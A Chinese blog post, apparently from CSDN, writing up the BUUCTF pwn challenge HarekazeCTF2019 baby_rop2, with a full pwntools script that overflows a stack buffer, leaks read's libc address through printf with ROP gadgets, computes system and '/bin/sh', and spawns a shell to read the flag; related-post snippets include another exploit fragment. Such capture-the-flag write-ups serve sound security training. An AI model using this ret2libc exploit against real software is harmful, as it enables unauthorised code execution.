BUUCTF(pwn)[HarekazeCTF2019]baby_rop2 泄露libc基址,rop,利用gadget

最新推荐文章于 2023-12-04 00:44:57 发布
最新推荐文章于 2023-12-04 00:44:57 发布
阅读量617 收藏 1
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/119620171
版权

64位,开了nx保护
在这里插入图片描述
运行了一下程序

在这里插入图片描述
在这里插入图片描述

buf的大小是0x20,但是读入的时候读入的是0x100,会造成溢出,我们要想办法覆盖返回地址为” system(‘/bin/sh’)
利用read函数,去泄露程序的libc基址,然后去获得system和/bin/sh字符串的地址
然后造成溢出,将返回地址覆盖为system(‘/bin/sh’)

from pwn import * 
from LibcSearcher import *
context.log_level='debug'
p=remote('node4.buuoj.cn',29343)
elf=ELF('babyrop2')
pop_rdi= 0x400733
pop_rsi_r15=0x400731
format_str=0x400770
printf_plt=elf.plt['printf']
read_got=elf.got['read']
main_plt = elf.sym['main']
payload= 'a'*0x28+p64(pop_rdi)+p64(format_str)+p64(pop_rsi_r15)+p64(read_got)+p64(0)+p64(printf_plt)+p64(main_plt)
p.recvuntil("name? ")
p.sendline(payload)
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc=LibcSearcher('read',read_addr)
libc_base=read_addr-libc.dump('read')
sys_addr=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump('str_bin_sh')
payload='a'*0x28+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)
p.interactive()

利用过程

一、 泄露libc基址
由于是64位程序,传参的时候需要用到寄存器
printf函数的原型int printf( const char* format , [argument] … );
举个例子–>print(’%s’,‘hello world’)

这里需要两个参数设置rdi,rsi寄存器

ROPgadget --binary babyrop2 |grep "pop rdi"

在这里插入图片描述
rdi_addr=0x400733

ROPgadget --binary babyrop2 |grep "pop rsi"

在这里插入图片描述
没有直接设置rsi寄存器的指令,这边后面还跟着一个r15,无所谓了,不用r15,给他随便设置一下就好了,我这边设置的0
pop_rsi=0x400731

首先要设置第一个参数,就是带有类似于%s这种格式的字符串,我这边是使用的程序里自带的语句
在这里插入图片描述
format_str=0x400770

接收输出的read函数地址

read_addr = u64(p.recvuntil(’\x7f’)[-6:].ljust(8, ‘\x00’))

接收地址基本上都是7个字节的,7f开头,补全8个字节

得到shell后利用find -name flag 去找到flag文件的位置 或者find -name "flag"

在这里插入图片描述
最后读出flag

cat /home/babyrop2/flag
半岛铁盒@
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 310
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 730
题时遇到了不少问题,有些还没有得到解决,在此进行记录
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 656
pwn 64位 泄露libc版本
关于printf函数泄露地址libc题型
IT_huanhuan的博客
05-25 494
我们在构建ROP链时,应该想我们需要怎样去泄露地址,才能达到我们所希望的程序执行,因为是64位的,我们需要一些 pop|ret 去放我们的参数,printf在执行打印格式化字符串时,有产生一个参数,然后我们还需要一个寄存器,来存放我们got表里所要的真实地址。最后加个main函数,是我们返回到main函数,让程序走一遍,以便我们可以写入接下来的payload去控制程序流。因为这道题,我们首先应该做的是泄露地址泄露那个地址,我觉得可以是printf或者是read的地址都行,接下来我们就尝试一下吧。
[HarekazeCTF2019]baby_rop2
m0sway的博客
04-07 1002
[HarekazeCTF2019]baby_rop2 WriteUp BUU_PWN
pwn学习资料整理——ROP技术(pwn_rop2
08-30
pwn学习资料整理——ROP技术(pwn_rop2
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
one_gadget:在libc.so.6中找到一个小工具RCE的最佳工具
02-05
这个宝石提供了这种小工具查找器,无需像傻瓜一样每次都使用objdump或IDA-pro :winking_face: 要使用此工具,请在命令行中键入one_gadget /path/to/libc并享受其中的魔力 :grinning_squinting_face:安装在RubyGems....
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
【描述】"baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛" 这段描述进一步明确了“baby_pwn”是该竞赛的一个具体赛题,可能是一个简化版或者入门级别的漏洞利用挑战,旨在让参赛者了解和实践基础的缓冲区...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
pwn】orw&rop --泄露libc基址,orw
最新发布
question55的博客
12-04 195
我们先看看程序的保护的情况因为题目提示了orw,我们可以沙箱检测一下可以发现是禁用的execve函数的,接着看函数逻辑这里格式化字符串漏洞可以泄露canary和puts函数地址,先确定一下参数位置可以发现参数是在第六个位置,接下来就是构造ROP,调用read函数读取shellcode到mmap开辟的地址就行,这里的gadget可以用题目给的libc.so.6进行寻找,exp如下:from pwn import *context(os='linux',arch='amd64',log_level='debug
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2
空城惜梦的博客
06-09 406
[PWN] BUUCTF [HarekazeCTF2019]baby_rop2解题分析漏洞利用payload解析payload 解题分析 按照惯例先checksec,发现开了nx和RELRO,又因为题目给了文件libc.so.6,所以猜测要需要构造ROP来布置程序执行路线图 运行程序来观察程序的逻辑,发现需要输入name,然后程序再把输入的name打印出来 64位IDA打开,发现buf缓冲区只有0x20个字节大小,但read却可以往buf缓冲区中写入0x100个字节,所以这里存在着栈溢出 shift+
CTF buuoj pwn-----[HarekazeCTF2019]baby_rop
bing_Max的博客
10-11 1896
exp from pwn import * sh = remote('node4.buuoj.cn', 342414) # 连接一个远程靶机。 elf = ELF('./babyrop') # elf函数调用,elf可以 bin_sh_addr = 0x601048 system_addr = 0x601060 pop_rdi_addr = 0x400683 payload = b'a'*0x10 + b'a'*8 + p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 7888
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
BUUCTF [HarekazeCTF2019]baby_rop2
红叶的博客
10-28 367
IDA Pro 静态调试。依旧可以使用上次的PoC。
Pwnprintf漏洞
weixin_52553215的博客
03-10 1090
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
buuctf pwn [HarekazeCTF2019]baby_rop2
weixin_45441024的博客
12-03 417
buuctf pwn [HarekazeCTF2019]baby_rop2 ret2libc 老样子还是先check一下,发现开启了NX,说明我们不能利用ret2shellcode了,将文件放到IDA里面来分析一下 题目中有%s字符的字样,我们就想到了利用格式化字符串来泄露某个函数的真实地址,来找到libc的版本,最后拼接出一个system("/bin/sh")来获取shell,通过上图我们找到了溢出点在read函数,buf距离栈底的高度为0x20 因为这是一个64位的程序,其参数是通过寄存器来传递的,
BUUCTF HarekazeCTF2019 babyrop2
doudoudedi
11-01 1242
这道题是用printf泄露已经调用过的函数确定libc文件然后用ROPgetshell(这里有格式化字符串,没有的话可以read一个然后在泄露反正够长) exp: #coding:utf-8 #name:doudou from pwn import * #p=process('./babyrop2') p=remote('node3.buuoj.cn',28818) elf=ELF('./baby...
buuctf [HarekazeCTF2019]baby_rop2
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值